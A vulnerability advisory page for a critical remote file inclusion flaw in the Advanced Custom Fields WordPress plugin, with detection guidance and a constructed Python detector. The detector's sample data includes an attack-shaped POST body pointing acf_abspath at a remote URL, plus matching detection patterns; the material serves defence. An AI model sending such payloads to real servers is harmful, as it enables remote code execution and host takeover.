CVE-2012-10025
Published: 2025-08-05
Priority: P2 (72) · Severity: critical, base score 10 (CVSS 4.0)
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Exploit: public exploit available (see references)
EPSS: 1.22% (65.0th percentile)
The WordPress plugin Advanced Custom Fields (ACF) version 3.5.1 and below contains a remote file inclusion (RFI) vulnerability in core/actions/export.php. When the PHP configuration directive allow_url_include is enabled (default: Off), an unauthenticated attacker can exploit the acf_abspath POST parameter to include and execute arbitrary remote PHP code. This leads to remote code execution under the web server’s context, allowing full compromise of the host.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| advanced_custom_fields | wordpress_plugin | <= 3.5.1 | — |
Detection & IOCs (extracted from sources)
- Monitor POST requests targeting the export.php script within the Advanced Custom Fields plugin path for external URLs in the acf_abspath parameter, which would indicate an RFI attempt.
- Flag any POST request where the acf_abspath parameter contains an http:// or https:// URL, as this is the injection vector for remote code execution.
- Exploitation is only possible when the PHP directive allow_url_include is enabled; audit PHP configurations for this setting as a risk indicator.
- Exploitation requires the non-default PHP configuration directive allow_url_include to be enabled; the vulnerability is NOT exploitable in default PHP installations.
- Only Advanced Custom Fields plugin versions 3.5.1 and below are affected; detections should be scoped accordingly.
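An added example (not code from the advisory, the plugin or its sources) that turns the detection guidance above into a check: it flags POST requests to the ACF export.php whose acf_abspath value is an http:// or https:// URL, and reads a php.ini fragment for the allow_url_include precondition. The plugin path prefix, the sample requests and the php.ini text are constructed for the demo.

```python
import re
from urllib.parse import parse_qs

# Constructed sample requests (method, path, raw POST body); not real traffic.
SAMPLE_REQUESTS = [
    ("POST", "/wp-content/plugins/advanced-custom-fields/core/actions/export.php",
     "acf_abspath=HTTP://203.0.113.5/x.txt&nonce=1"),      # remote URL: flag
    ("POST", "/wp-content/plugins/advanced-custom-fields/core/actions/export.php",
     "acf_abspath=%2Fvar%2Fwww%2Fhtml%2F&nonce=1"),         # local path: benign
    ("GET", "/wp-content/plugins/advanced-custom-fields/core/actions/export.php", ""),
    ("POST", "/wp-login.php", "log=admin&pwd=x"),
]

EXPORT_PATH_RE = re.compile(r"/advanced-custom-fields/core/actions/export\.php$", re.I)
REMOTE_URL_RE = re.compile(r"^\s*https?://", re.I)   # scheme check is case-insensitive


def is_acf_rfi_attempt(method, path, body):
    """True if the request matches the advisory's pattern: a POST to the ACF
    export.php whose acf_abspath value starts with http:// or https://."""
    if method.upper() != "POST":
        return False
    if not EXPORT_PATH_RE.search(path.split("?", 1)[0]):   # ignore query string
        return False
    params = parse_qs(body, keep_blank_values=True)
    return any(REMOTE_URL_RE.match(v) for v in params.get("acf_abspath", []))


def flag_requests(requests):
    """Return the (path, body) pairs that should raise an alert."""
    return [(p, b) for m, p, b in requests if is_acf_rfi_attempt(m, p, b)]


def allow_url_include_enabled(php_ini_text):
    """Report whether allow_url_include is on in the given php.ini text.
    PHP treats 1/On/True/Yes as true; the default is Off. Only php.ini text is
    read here (assumption); the directive may also be set in httpd.conf."""
    enabled = False
    for raw in php_ini_text.splitlines():
        line = raw.split(";", 1)[0].strip()                 # drop ; comments
        key, sep, value = line.partition("=")
        if sep and key.strip().lower() == "allow_url_include":
            enabled = value.strip().strip("\"'").lower() in ("1", "on", "true", "yes")
    return enabled


if __name__ == "__main__":
    for path, body in flag_requests(SAMPLE_REQUESTS):
        print("ALERT: possible ACF RFI attempt:", path, body)
    ini = "[PHP]\nallow_url_fopen = On\nallow_url_include = On ; risky\n"   # constructed
    print("allow_url_include enabled:", allow_url_include_enabled(ini))
```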
No detection rules found.
No writeups or analysis indexed.
References
- http://web.archive.org/web/20121223025326/http://secunia.com:80/advisories/51037
- https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb
- https://wordpress.org/plugins/advanced-custom-fields/
- https://wpscan.com/vulnerability/d132d93b-509c-490d-8001-87147ed28c5e/
- https://www.exploit-db.com/exploits/23856
- https://www.tenable.com/plugins/nessus/63326
- https://www.vulncheck.com/advisories/wordpress-plugin-advanced-custom-fields-remote-file-inclusion
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/advanced-custom-fields/advanced-custom-fields-351-remote-code-execution-via-remote-file-inclusion